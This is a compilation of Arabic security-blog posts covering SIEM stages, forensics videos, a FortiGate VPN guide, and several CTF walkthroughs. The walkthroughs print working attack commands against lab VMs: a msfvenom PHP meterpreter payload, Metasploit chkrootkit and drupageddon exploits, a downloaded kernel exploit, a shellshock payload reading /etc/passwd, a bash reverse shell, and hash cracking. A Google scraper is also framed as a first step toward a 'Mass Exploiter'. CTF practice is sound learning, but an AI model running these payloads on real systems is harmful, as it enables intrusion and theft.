يقوم مبدأ هذا النظام – بشكل مختصر – على زيادة كفاءة عملية مراقبة الأحداث و المعلومات الأمنية الصادرة عن مختلف أنظمة تكنولوجيا المعلومات على اختلاف أنواعها من خلال توفير الوقت و الجهد و زيادة الدقة في كشف الحوادث الأمنية (Security incidents) أو حتى مقدمات حدث أمني محتمل وذلك عن طريق جمع المعلومات في نظام مركزي و تحليلها و كشف أية أحداث مشبوهة محتملة و عرضها للمحلل الأمني أو لفريق المراقبة كي يقوم الفريق بدوره باتخاذ الإجراء المناسب، وأحياناً تكون هذه الأنظمة قادرة على القيام بإجراء وقائي من تلقاء نفسها كتحديث نظام الـ Firewall  أو نظام الـ IPS لصد الهجوم أو الاختراق حالة حدوثه.

نأتي الان لمراحل عمل هذا النظام الأمني.

المرحلة الأول: جمع المعلومات و الأحداث الأمنية:

عند التخطيط لتطبيق نظام الـ SIEM  يقوم الفريق الأمني بتحديد المصادر التي يرغب بمراقبتها و طبيعة المعلومات التي ينوي جمعها كي يتأكد من اختيار النظام الأمني الذي يتطابق مع البيئة التقنية الموجودة و التي يرغب بمراقبتها. على سبيل المثال، إذا كانت الشركة أو المؤسسة المعنية تطبق قواعد البيانات Sybase، فيجب على الفريق الأمني أو الشخص المنوط به تطبيق النظام اختيار نظام للرقابة بإمكانه جمع المعلومات من هذا النوع من قواعد البيانات بشكل فعال و دقيق حيث تعتمد فعالية هذا النظام الى حد كبير على نوعية و كمية المعلومات و الأحداث الأمنية التي يتم جمعها.

المرحلة الثانية: تصنيف المعلومات و الأحداث الأمنية:

بعد جمع المعلومات يقوم النظام بتصنيف المعلومات حسب طبيعة و نوع المصدر و تركيبة الحدث لأمني (Security event) أو المعلومة التي تم استقبالها. فمثلاً، تقوم هذه الأنظمة المتقدمة بتمييز أجهزة الشبكات و البنية التحتية و التعرف على تركيبة الحدث الأمني (Security event) لكي تتمكن بعدها من استخراج عنوان بروتوكول الأنترنت لمصدر الحدث (Source IP address)، عنوان الجهة (Destination IP address)، رمز/بورت الخدمة (Port number)، وقت و تاريخ الحدث، وغيرها من التفاصيل ووضعها داخل قاعدة البيانات الخاصة بالنظام كي يسهل الوصول اليها و استخراجها وتحليلها.

المرحلة الثالثة: التحليل:

يقوم النظام في هذه المرحلة بمقارنة المعلومات التي تم جمعها و تصنيفها مع مجموعة من القواعد و المحددات و التي تكون عادة على شكل قواعد منطقية (Logical Rules) يتم بناءها مباشرة بعد تطبيق النظام، تحدد هذه القواعد آلية عمل منظومة المراقبة. على سبيل المثال، قد يرغب المحلل بإنشاء مجموعة من القواعد التي تنص على أنه في حال استقبال 3 أحداث متتالية لفشل في عملية الدخول الى نظام تشغيل سيرفر البريد الإلكتروني خلال فترة 15 دقيقة  خارج أوقات الدوام الرسمي، عندها يقوم النظام بإرسال رسالة نصية أو بريد الكتروني الى فريق المراقبة مما يمكن الفريق من اتخاذ الإجراءات اللازمة، كما يمكن للنظام اتخاذ إجراء تقني معين كتحديث نظام الحائط الناري (Firewall) لصد عملية اختراق محتملة.

المرحلة الرابعة: كشف الروابط بين الأحداث و البيانات المختلفة (Correlate):

تعتبر هذه المرحلة من المهام المهمة لعمل هذا النظام، وعادة ما تعتبر هذه المرحلة من مميزات النظام التي تميزه عن غيره من الأنظمة المنافسة حيث يعتبر بمثابة “العقل المدبر” للنظام.

تقوم فكرة هذه المرحلة على أنه من غير المجدي تحليل حدث أمني معين من نظام معين بمعزل عن باقي الأنظمة ومكونات البنية التحتية، اذا أنه عادة يتطلب كشف حادث أمني أو اختراق معين تحليل البيانات و المعلومات الأمنية الصادرة من عدة مصادر مختلفة على شبكة الشركة أو المؤسسة كي يتمكن المحلل الأمني من تتبع الحادث ووضعه في سياقه المناسب. على سبيل المثال، ملاحظة عدد قليل من المحاولات الفاشلة لاختراق الحائط الناري (Firewall) من مصدر معين على الشبكة العنكبوتية قد لا يعني الشيء الكثير مقارنة مع تتبع نشاطات نفس المصدر على عدة أنظمة بشكل كامل و اكتشاف أن هذا المصدر قد قام ببعض المحاولات الفاشلة على الحائط الناري قبل أن يتمكن من القيام باختراق ناجح أمكنه من الوصول الى خادم (Server) داخلي، و بعد القيام بالعديد من محاولات الدخول الفاشلة على نظام تشغيل الخادم باستخدام تقنيات الـ Brute force attack قبل تمكن المصدر من اكتشاف كلمة السر الخاصة بـمدير نطاق الشبكة  (Domain Administrator) ومن ثم الوصول الى خادم آخر يحتوي قاعدة بيانات تشمل تفاصيل عملاء الشركة و بياناتهم باستخدام نفس معلومات التعريف الخاصة بمدير نطاق الشبكة. مثل هذا التسلل المنطقي للأحداث و طرق كشفها من خلال تحليل كم كبير من البيانات القادمة من عدد كبير من الأنظمة لا يمكن القيام به من دون الاستعانة بمثل هذه الأنظمة ذكية. كما يوفر هذا النظام الأدلة المنطقية اللازمة لرفع القضايا لدى الجهات الأمنية في الحالات الجرمية.   

المرحلة الخامسة: تنبيه الشخص المعني و عرض تفاصيل الحادث الأمني (Notifications and reporting):

هذه هي المرحلة الأخيرة من مراحل عمل النظام وتهدف الى عرض تفاصيل وافية عن الحوادث المحتملة التي كشفها النظام. تشمل هذه التفاصيل عنوان المصدر IP address وعنوان النظام أو الجهاز المستهدف ووقت وقوع الحادث و اسم المستخدم username وتفاصيل الحدث وغيرها من التفاصيل المهمة. كما يمكن للنظام ارسال رسائل تنبيهية لفريق المراقبة أو الضابط الأمني (Security officer) من خلال خدمة الرسائل القصيرة، بالإضافة للكثير من الميزات التنبيهية الأخرى التي يمكن لهذه الأنظمة القيام بها.

في النهاية، يجب التنويه  الى أن هذه الأنظمة – كغيرها – تتطلب الكثير من التحضير و التهيئة و بناء القواعد المنطقية التي تحدد طريقة وكفاءة عملية التحليل وضبط هذه القواعد وتعديلها أو ما يعرف بـ Tuning و ربما تعديلات على الأنظمة الأخرى كي تتمكن من ارسال الحوادث و المعلومات و البيانات الأمنية المهمة الى النظام خصوصاً في المراحل المبكرة من تشغيلها و إدارتها. و بينما تتناقص الحاجة لمثل هذه الأمور مع مرور الزمن الا أنه ينبغي على المحلل أو الضابط الأمني الاستمرار بمراجعة تلك القواعد المنطقية  و تطويرها و تثبيت التحديثات الخاصة بالنظام و القيام ببعض النشاطات الأخرى المتعلقة بصيانة النظام كأي نظام آخر. كما أنه يتوقع أحيانا ارسال النظام بعض الإنذارات الخاطئة (False alerts) و التي يمكن من الحد منها عن طريق القيام بمزيد من الضبط و التعديل.

اقرأ ايضا مقال : بناء خطة ناجحة للاستجابة للحوادث

في هذا الفيديو تم توضيح كيفية استخدام اداة netcat اثناء عمل live analysis لجهاز ونقل كل البيانات التي تم جمعها ونقلها  عن طريق اداة netcat الى forensics workstation بشكل مباشر . نحن نحاول تجنب حفظ اي بيانات او انشاء اي ملفات على الدليل لذلك سوف نقوم بنقل كل شي بشكل مباشر الى جهاز المحقق الجنائي الموصول بنفس الشبكه .

في حاله كان الجهاز الدليل غير متصل باي شبكه يمكن ايصال كابل بشكل مباشر بين جهاز المحقق والدليل وبدء النقل .

في هذا الفيديو افترضت بانك قد القيت نظره على الفيديو السابق الذي قمنا فيه باعداد incident response toolkit , وقمت بافتراض ايضا انك قمت بكل الخطوات اللازمه لتشغيل الادوات من الـ toolkit الخاصه بك .

في هذا الفيديو سوف القينا نظره على forensics timeline analysis وهي عملية مهمه جدا لمعرفة التسلسل الزمني لكل التغييرات التي حدثت في النظام وتحليلها حسب الوقت .  واستعرضنا طريقتين في هذا الفيديو

الطريقة الاولى
باستخدام باش سكربت يقوم بجمع metadata لكل الملفات ونقوم بتصدير هذه المعلومات الى برنامج libreoffice calc ثم عمل sorting للملفات بشكل سلسل جدا .

الطريقة الثانيه
استخدمنا اداة autopsy لبناء timeline واستعرضنا الاداة بشكل سريع .

ملاحظه : في الشرح قمت بتصدير ملف معلومات الملفات الى نفس الجهاز فقط لمجرد توضيح العمليه ولكن يجب عليك عدم انشاء او حفظ اي بيانات في الدليل . يمكنك الرجوع الى شرح اخر عن كيفية تصدير البيانات باستخدام اداة netcat من الرابط التالي

فيديو : كيفية استخدام اداة netcat لعمل forensics live analysis

volatility هي بيئة كاملة مبرمجة بلغة البايثون  ومفتوحة المصدر تحتوي على جميع الادوات المطلوبه لعمل تحليل الذاكرة (RAM). يمكن استخدام المشروع لتحليل تقريبا كل الصور لكل الانظمه مثل وندوز , لينكس , ماك , اندرويد , ايضا يمكن تحليل ذاكرة اجهزة الـ virtualbox .

في هذا الفيديو قمت بشرح كيفية استخدام اداة volatility لتحليل صورة من نظام مشتبه به واستخراج بعض المعلومات من الصوره لغرض التوضيح لكيفية استخدام الادة .

روابط الشرح :

• فيديو : شرح استخدام اداة FTK imager

• صفحة مشروع اداة volatility

في هذا الشرح سوف اشرح كيفية حل تحدي SickOS 1.2 . هذا هو الثاني في السلسلة المتتالية من SickOs وهي مستقلة عن الإصدارات السابقة, مجال التحدي هو الحصول على اعلى الصلاحيات التابعة للنظام. هذا CTF يعطي تشبيه واضح عن كيف ان إستراتيجيات الإختراق تنفذ على الشبكة للحد منها في بيئة أمنة.

اولا قم بتحميل SickOS من هنا

لنقم الان بإيجاد هدفنا بإستخدام

netdiscover

هدفنا هو 192.168.1.105 إضافة لذلك سوف ننفذ nmap :

nmap -A -p- 192.168.1.105

وكما ترى بان البورت 80 مفتوح وهذا يعني بانه بامكاننا فتح هذا ip في المتصفح. لماذا لانقم بهذا؟

بعد وضع ip في المتصفح سوف يظهر لنا هذه الصورة التي في الأعلى والتي ليس لديها هدف.يكنك المحاولة ورؤية مصدر الصفحة لكن للأسف لن تجد شيئا. لهذا السبب سوف نستخدم dirb لإيجاد المسارات :

dirb http://192.168.1.105

وعند رؤيتك للنتيجة سوف نجد مسارنا, مثال: test إفتحها في المتصفح ايضا.

192.168.1.105/test/

سوف يظهر لك قائمة المسارات. لنحاول ونستكشف مسار test بواسطة curl.

curl -v -X OPTIONS http://192.168.1.105/test

هذا الإستكشاف سوف يظهر لك بأن PUT مسموح بها وهذا يعني بأنك تستطيع الرفع عبرها.

اذا قم بتحضير الملف الخبيث الذي تريد رفعه بإستخدام msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

اسنخ الكود من php?> الى ()die وأحفظه في الملف بلاحقة php.

الان لرفع ملفك (ملف php.) سنستخدم أضافة المسماة poster.

انقر على tools من شريط menu. وبعدها إنقر على poster من القائمة المنسدلة.

الصندوق التالي سوف يفتح. هنا, تصفح الملف الذي تريد ان ترفعه وانقر على خيار PUT

سوف بظهر لك بان الملف تم رفعه

ويمكنك ان ترى نفس الشئ على متصفحك بان الملف سوف يتم رفعه(وفي حالتنا, الملف هو shell.php)

بنفس الوقت,قم بفتح metasploit وإستخدم multi/handler :

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
exploit

وبعد النقر على زر enter على لوحة المفاتح, قم بتشغيل الملف. سوف يعطيك جلسة meterpreter.

إذهب الى الشيل واكتب :

shell

والأن نحتاج لإستيراد ملف البايثون للوصول الى الterminal ولذلك سوف نكتب التالي :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

الان نقوم بالتحقق من نسخة kernal التي يمكن ان نستغلها :

lsb_release -a

وكما ترى بان النسخة غير مستغلة لذلك سوف نتركها لحالها.

وبالإنتقال الى الامر التالي لإستكشاف المزيد وإيجاد شئ ما لإستغلاله:

ls -l /etc/cron.daily

الأمر الموجود في الأعلى سوف يعطيك قائمة الملفات. بعد المراقبة سوف تجد chkrootkit. البعض من نسخته يمكن ان يستغل وبالتالي سوف نتحقق من نسخته:

chkrootkit -V

سوف يظهر لك النسخة وهي 0.49 .

سوف نبحث الان عن أستغلال في terminal لنظام كالي بكتابة :

searchsploit chkrootkit

الان افتح metasploit وتحقق من الجلسة المفتوحة مسبقا وبعدها ابحث عن الإستغلال بكتابة :

search chkrootkit

وسوف يظهر الإستغلال الذي يجب عليك إستخدامه.

وبعدها اكتب options لمعرفة الخيارات المفروض ان تضعها. التحقق من الخيارات التي تعرفها تستوجب منك تعيين الجلسة و lport ولهذا اكتب:

use exploit/unix/local/chkrootkit
set session 1
set lport 8080
exploit

الان تحقق من حصولك على جلسة اخرى او لا ولهذا اكتب :

sessions

ويمكنك بالتاكيد روؤية بانك حصلت على جلسة اخرى ولفتحها اكتب :

sessions -i 2

وبفتحك للجلسة قم بالتحقق من اي مستخدم انت مسجل ولتتحق اكتب :

whoami

سوف تظهر لك بانك داخل الرووت وللمزيد اكتب:

cd /root

ولرؤية قائمة الملفات في الرووت:

ls -lsa

في هذه القائمة سوف ترى وجود ملف نصي ولقراءته :

cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

ترجمة مقال : (Hack the SickOS 2.1 VM (CTF Challenge

في هذه المقاله سنكمل تحدي من تحديات root2boot من نوع Capture the flag .

اليوم سيكون التحدي هو أيجاد جمله في ملف نصي مخبئ

أولا قم بتحميل ملف الـVM من هنا

وبعد تنصيب الملف نقوم بتنفيذ بالأمر:

netdiscover

الأن كما نري فالجهاز الهدف هو 192.168.1.103 ولنقم الأن بفحصه بأداه nmap

nmap -A 192.168.1.103

بعد الفحص سنجد أن المنفذ 80 مفتوح ومنصب عليه Drupal الأصدار 7 والذي هو معروف عنه بأنه مصاب.

لذلك فلنبدأ الأن بمحاوله أختراقه وبعد فتح metasploit قم بكتابه الأمر :

search drupal

بعد البحث عن الأستغلالات المتاحه في قاعده بيانات الـMetasploit سنقوم بأستخدام drupal_drupageddon ولذلك أكتب الأن الأوامر التاليه :

use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.103 #(IP of Remote Host)
set rport 80
exploit

وبعد تنفيذ الأستغلال كما في الصوره السابقه سوف تحصل علي جلسه من نوع meterpreter

والأن تنفيذ الأمر الأتي سيجعلك تتحكم في المسار الذي أنت فيه بشكل أفضل

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

والأن نحن في تيرمنال الهدف والخطوه التاليه هي معرفه أصدار الكيرنل الخاص بالجهاز بتطبيق الأمر الأتي :

lsb_release -a

والأن نحن نعرف أن الجهاز الهدف يستخدم Ubuntu 14.04 والأن لنبحث علي موقع exploit-db.com في محاوله لأيجاد ثغره به

وبعد أنتهاء البحث سنجد أن بالفعل الجهاز به الثغره المراده :

وكما ستلاحظ أن الثغره لا يوجد لها أستغلال علي الـMetasploit

والأن لتحميل الأستغلال علي الجهاز يجب أن نجد مجلد نستطيع أن نكتب به وهذا يتم من خلال الأمر :

find / -writable -type d 2>/dev/null

وهنا قمت بأختيار مجلد tmp للكتابه به

cd /tmp/
wget https://www.exlpoit-db.com/download/37292

الأن بعد تحميل الملف نقم بنقله ومن ثم عمل عمليه كومبايل له :

mv 37292 37292.c
gcc 37292.c -o kernel
chmod 777 kernel
./kernel

الأن بعد تشغيل الملف نتأكد أننا بصلاحيات رووت ومن ثم ننتقل الي المجلد رووت

whoami
cd /root
ls

الان ستجد ملف يسمي dave.tc ولو حاولت أن تفتحه من المتصفح سيقول لك حمله ! حسنا لنقم بذلك !

سنقوم الأن بنقله لمجلد /var/www/html/sites لتحميله بسهوله

cp dave.tc /var/ww/html

والأن سنقوم بفتح الملف من خلال برنامج VeraCrypt

تستطيع أن تقوم بتحميله من هنا

والأن قم بفتح الملف وأختر رقم 1

ولكن اذا حاولت أن تقوم بفتحه سيطلب منك كلمه السر

وبما أننا لا نملك كلمه السر فلنبحث عنها

أول خطوه هو أن نقوم بقرائه الملف الذي يحتوي علي جميع قيم الهاش والتي هي في مجلد shadow

ولنقم بقرائتها نقم بالأمر الأتي :

والأن معنا قيمه الهاش الخاصه بمجلد رووت والأن لنقم بمعرفه نوع الهاش المستخدم

ولنقم بذلك سنستخدم موقع من المواقع الخاصه بهذا ولهذا أبحث عن online hash identifier

سنستخدم موقع onlinehashcrack.com وبعدما تضع قيمه الهاش به سيظهر أن نوع الهاش هو SHA512

والأن لنقم بقراءه الأيميلات المحفوظه علي الجهاز كما لمح لها من قبل

cat /var/mail/www-data

من خلال قراءه الأيميل نعرف بعض المعلومات المهمه وهي :

• طول كلمه السر 11 حرف
• كلمه السر لها علاقه بكلمه أكاديميه

وهنا الأن سنستخدم ملف rockyou.txt والذي كان قد لمح له من قبل ايضا.

ولكن لن نقوم بتخمين كل كلمات السر الموجوده به فهي كثيره والدليل علي ذلك حجمه (8 ميجا) ولو قمنا بأستخدامه كما هو فسيمر اليوم بأكمله قبل أن نجد كلمه السر ولذلك سنقوم بعمليه فلتره لنقلل كلمات السر التي سنخمنها وكلمات السر التي ستتبقي سينطيق عليها ثلاثه شروط وهي

1. طولها 11 حرف
2. كل الحروف صغيره
3. تكون بها كلمه “academy”

ولعمل هذا سنستخدم الأمر الأتي :

awk ‘length($1) == 11 { print $1 }’ /usr/share/wordlists/rockyou.txt |egrep ‘^[[:lower:]]+academy’ > /root/Desktop/pass.txt

والان سنستخدم truecrack لتخمين كلمه السر من الكلمات المتبقيه

truecrack –truecrypt /root/Download/dave.tc -k SHA512 -w ?root/Desktop/pass.txt

وبمجرد أستخدام الأمر ستجد كلمه السر في ثوان.

والأن نقم بفتح برنامج Veracrypt كما سبق ونقم بأدخال كلمه السر التي وجدناها

وبمجرد أن تضغط OK ستجد الملف لديك علي الجهاز

والأن نقم بفتحه ومبرووك وجدنا العلم المراد

ترجمة لمقال : Hack the Droopy VM CTF Challenge

في هذه المقاله سأقوم بالشرح ” خطوه بخطوه ” كيف تقوم ببرمجه الـGoogle Scraper الخاص بك بسهوله بلغه البايثون ومن ثم جعله Scanner أو Mass Exploiter

المتطلبات :

• بايثون أصدار 3
• مكتبه Requests
• مكتبه Beautifulsoup4

ولتثبيت المكتبات المطلوبه نقوم بالأمر الأتي :

python -m pip install requests beautifulsoup4

أولا لنفهم كيف يعمل البحث في جوجل

http://www.google.com/search

هذا الرابط يأخذ 2 باراميتر وهما q و start

الباراميتر q يحمل الكلمه التي نبحث عنها

الباراميتر start يحمل رقم صفحه البحث التي نحن بها مضروب في 10

ولذلك أذا أردت مثلا البحث عن كلمه isecur1ty فستكون هذه النتيجه

الصفحه 0 : http://www.google.com/search?q=isecur1ty&start=0
الصفحه 1 : http://www.google.com/search?q=isecur1ty&start=10
الصفحه 2 : http://www.google.com/search?q=isecur1ty&start=20
الصفحه 3 : http://www.google.com/search?q=isecur1ty&start=30
...
....

والأن لنقوم بعمل تجربه بسيطه ونري أذا كنا سنستطيع أن نأتي بكود الصفحه الأولي في البحث

import requests
payload = { 'q' : 'isecur1ty', 'start' : '0' }
headers = { 'User-agent' : 'Mozilla/11.0' }
req = requests.get( 'http://www.google.com/search', payload, headers=headers )
print(req.text.encode('utf-8'))

فيقوم بكتابه الكود المصدري للصفحه الأولي

الأن سنستخدم مكتبه beautifulsoup4 لجلب البيانات التي نحتاجها فقط من الكود

كما نري فالبيانات التي نحتاجها تكمن داخل تاج h3 بالـclass r

اذا نستنتج الأن أن كل صفحه سيكون بها 10 تاجات <“h3 class=”r> وبداخل كل تاج <a href> يحتوي علي الرابط الخاص بنتيجه البحث

اذا الأن سنستخدم مكتبه beautifulsoup4 ومكتبه re لفرز نتيجه البحث

import requests, re
from bs4 import BeautifulSoup
payload = { 'q' : 'isecur1ty', 'start' : '0' }
headers = { 'User-agent' : 'Mozilla/11.0' }
req = requests.get( 'http://www.google.com/search', payload, headers=headers )
soup = BeautifulSoup( req.text, 'html.parser' )
h3tags = soup.find_all( 'h3', class_='r' )
for h3 in h3tags:
    try:
        print(re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1))
    except:
        continue

فستجد روابط الصفحه الأولي في البحث

الأن لنقوم بتنظيم الكود قليلا ولذلك سأقوم بعمل داله للبحث ولجعل الأداه قابله للأستخدام من التيرمنال سأقوم بأستخدام مكتبه sys ولكن تستطيع أستخدام أي مكتبه أخري أذا أردت مثل argparse أو docopt

import requests, re, sys, time
from bs4 import BeautifulSoup

def search_for(string, start):
 urls = []
 payload = { 'q' : string, 'start' : start }
 headers = { 'User-agent' : 'Mozilla/11.0' }
 req = requests.get( 'http://www.google.com/search',payload, headers = headers )
 soup = BeautifulSoup( req.text, 'html.parser' )
 h3tags = soup.find_all( 'h3', class_='r' )
 for h3 in h3tags:
 try:
 urls.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
 except:
 continue
 return urls

def printf(lista): #To print list line by line like printf in python 3
 for i in lista:
 print( " " + str( i ) )

usage = """ Usage:
 Mass_Exploiter.py <search> <pages>

 <search> String to be searched for
 <pages> Number of pages to search in"""

try:
 string = sys.argv[1]
 page = sys.argv[2]

 if string.lower() == "-h" or string.lower() == "--help":
 print(usage)
 exit(0)

except:
 print(" * * Error * * Arguments missing")
 print("\n"+usage)
 exit(0)

start_time = time.time()
result = []
for p in range(0,int(page)):
 result = result + search_for( string, str(page*10) )
printf( set( result ) )
print( " Number of urls : " + str( len( result ) ) )
print( " Finished in : " + str( int( time.time() - start_time ) ) + "s")

والأن نقوم بتجربته بالبحث عن كلمه facebook وعرض نتايج أول صفحه فقط

رائع الكود يعمل بسلاسه والأن لنضيف أليه السرعه ليقوم بفحص صفحات أكثر في وقت أقل وسنقوم بذلك عن طريق مكتبه Multiprocessing فيصبح الكود كالأتي

import requests, re, sys, time
from bs4 import BeautifulSoup
from functools import partial
from multiprocessing import Pool

def search_for(string, start):
    urls = []
    payload = { 'q' : string, 'start' : start }
    headers = { 'User-agent' : 'Mozilla/11.0' }
    req = requests.get( 'http://www.google.com/search',payload, headers = headers )
    soup = BeautifulSoup( req.text, 'html.parser' )
    h3tags = soup.find_all( 'h3', class_='r' )
    for h3 in h3tags:
        try:
            urls.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
        except:
            continue
    return urls

def printf(lista): #To print list line by line like printf in python 3
      for i in lista:
            print( " " + str( i ) )

def main():
      usage = """      Usage:
        Mass_Exploiter.py <search> <pages> <processes>

            <search>          String to be searched for
            <pages>           Number of pages to search in
            <processes>       Number of parallel processes"""

      try:
            string = sys.argv[1]
            page   = sys.argv[2]
            proc    = int( sys.argv[3]  )

            if string.lower() == "-h" or string.lower() == "--help":
                  print(usage)
                  exit(0)

      except:
            print(" * * Error * * Arguments missing")
            print("\n"+usage)
            exit(0)

      start_time = time.time()
      result = []
      request = partial( search_for, string )
      pages = []

      for p in range( 0, int(page)):
            pages.append(p*10)

      with Pool(proc) as p:
            all = p.map(request, pages)
      for p in all:
            result += [ u for u in p]
      printf( set( result ) )
      print( " Number of urls : " + str( len( result ) ) )
      print( " Finished in : " + str( int( time.time() - start_time ) ) + "s")
      
if __name__ == '__main__':
      main()

لاحظ أنني قمت بأستخدام مكتبه functools حتي أقوم بتجزئه المهام علي كل بروسيس

والأن نقوم بأختبار السكربت بالبحث عن كلمه facebook مجددا ولكن في 20 صفحه وسأستخدم 6 بروسيس ولنري كيف أصبحت سرعه السكربت

كما تري السكربت أصبح أسرع بحوالي 6 مرات عند أستخدام

تحذير :

لا تقم بأستخدام أكثر من 8 بروسيس حيث أن جوجل سيقوم بعمل حذر لجهازك أو بأظهار كابتشا بدل صفحه البحث , ولذلك يفضل أن لا يظل عدد البروسيس أقل من 8 .

وكان هذا الجزء الأول من طريقه عمل الأداه الخاصه بك للبحث في جوجل وفحص الثغرات بلغه البايثون وفي المقاله القادمه سأشرح كيف تطور هذه الأداه وتجعلها تفحص المواقع من الثغرات مثل sqli
ترجمة المصدر الرئيسي : https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/

حلقة جديدة من iSecur1ty Podcast قُمنا بالتحدث فيها انا ومحمد عسكر عن الاختراق الاخير الذي حصل لشركة ياهو وتسريب معلومات ما يقارب مليار حساب. المعلومات التي تم تسريبها تتضمن الاسم , رقم الهاتف , تاريخ الميلاد , الاسئلة السرية الغير مشفرة , وكذلك بالطبع الباسورد المشفر بـ MD5 .

الاختراق يعتقد انه كان منذ سنوات (2013) ولكن تم الافصاح عنه يوم الاربعاء الماضي وهذا ليس الاختراق الوحيد الذي تعرضت له شركة ياهو فقد تعرضت لاختراق سابق وتسربت معلومات اكثر من 500 مليون حساب .

ايضا تطرقنا لبعض النصائح والطرق التي ممكن ان تستخدمها لزياده امان حسابك على شبكة الانترنت .

وصلات الحلقة :

فيديو : شرح استخدام خزانة كلمات المرور keepassx

مقال : أهمية توعية الموظفين بأمن المعلومات

اليوم سنقوم بأذن الله بحل تحدي أخر من تحديات الـCTF

أولا قم بتحميل ملف الـVM من هنا

أول شئ نستخدم netdiscover لمعرفه الجهاز الهدف

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.178 هو الهدف

الأن نستخدم أداه nmap لمعرفه المنافذ المفتوحه

nmap -sV -v -O -A -T5 192.168.79.178 -p-

يتضح أنه كلا من المنفذ 22 والمنفذ 3218 مفتوح والمنفذ 3218 عليه الخدمه Squid.

وعند فتح مشروع الـMetasploit والبحث عن كلمه Squid وجدت الأتي :

لذلك سنستخدم هذا الموديول الأن في عمل فحص للخدمه

يتضح أن المنفذ 80 مفتوح

ولذلك سنقوم الأن بأستخدام أضافه FoxyProxy الخاصه بالفيرفوكس لأستخدام الجهاز من البورت 3128 كا بروكسي

والأن نقوم بفتح العنوان http://192.168.79.178

والأن سنقوم بأستخدام أداه nikto لفحص الجهاز

nikto -h localhost -useproxy http://192.168.79.178:3128

يتضح أنه مصاب بثغره shellshock ! فلنقم بأختباره

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

أنها تعمل ومن الواضح أيضا أنه يوجد حساب بأسم sickos

والأن لنجهز شيل عكسي

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1
nc -nlvp 4444

وفي نافذه أخري

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

ونحصل علي الشيل

وبعد الدخول علي الجهاز وجدنا ملف مثير للأهتمام var/www/wolfcms/config.php

كما هو واضح كلمه السر هي john@123

والأن ندخل الجهاز من خلال خدمه SSH بأسم المستخدم sickos وكلمه السر john@123

والأن لنتأكد من صلاحياتنا

sudo -l

يتضح أنه بصلاحيات Root

المقاله مترجمه من المقاله الأصليه

في هذا المقال , سوف تتعلم كيفية ربط شبكتين باستخدام منتج FortiGates لشبكات مختلفه قد تكون فروع لشركة او ما شابة وذلك بإستخدام IPsec VPN.

الشبكتين سوف يتم ربطهم بـ FortiGates بإستخدام VPN Wizard’s Site to Site .

في هذا المثال, الفرع الأول سيشار إليه بـ HQ والأخر سيشار إليه بـ Bransh.

1. إعداد الـ HQ IPsec VPN

على HQ Fortigate, إذهب الى VPN > IPsex Wizard

وإختر قالب Site to Site وإختر FortiGate.

في خطوة التحقق “Authentication” ,ضع عنوان IP الخاص بالفرع “Branch FortiGate” وفي هذا المثال هو “172.20.120.135”. وبعد وضعك لـ Gateway, المنفذ المتاح سوف يعيين كمنفذ خارجي. اذا أحببت إستخدام منفذ مختلف قم بالإختيار من القائمة المنسدلة.

ايضا قم بوضع Pre-shared Key أمن.

في خطوة Policy & Routing , حدد Local Interface. والـ Local Subnets ستضاف بشكل تلقائي. ضع Remote Subnets الى الـ local subnet التابعة لـ Branch FortiGate (وفي المثال, 5.5.5.5/24).

الصفحة التالية سوف تظهر الإعدادات المنشئة عبر wizard لمعاينتها و تشمل عناوين الفايرول  , static route و السياسات الأمنية.

2. إعدادات Branch IPsec VPN

على Branch FortiGate, إذهب الى VPN> IPsec Wizard.

وإختر قالب Site to site, ثم إختر FortiGate.

في خطوة التحقق “Authentication” ,ضع عنوان IP الخاص الفرع الرئيسي “HQ FortiGate” وفي هذا المثال هو”172.20.121.92″. وبعد وضعك لـ Gateway, المنفذ المتاح سوف يعيين كمنفذ خارجي. يمكنك استخدام منفذ اخر اذا احببت.

وضع نفس Pre-shared Key الذي وضعته لـ HQ’s VPN.

في خطوة Policy & Routing , حدد Local Interface. والـ Local Subnets ستضاف بشكل تلقائي. ثم ضع Remote Subnets الى الـ local subnet التابعة لـ HQ FortiGate (وفي المثال, 10.10.10.1/24).

الصفحة التالية سوف تظهر الإعدادات المنشئة عبر wizard لمعاينتها و تشمل عناوين الفايرول ,  static route و السياسات الأمنية.

3. اخيراً

على إحدى FortiGate, إذهب الى Monitor>IPsec Monitor لتحقق من حالة VPN tunnel. اضغط زر الماوس اليمين تحت status وحدد Bring up.

الان , يمكن لأي مستخدم من خلال إحدى شبكات الفرعين على الإتصال بأي عنوان مع الطرف الثاني بشكل سلسل جدا .

اذا احتجت اختبار الاتصال والتاكد من ان كل شي على مايرام قم بعمل PING لشبكة HQ من شبكة الـ Branch .

المقالة الأصلية لصاحبها Adam Bristow.

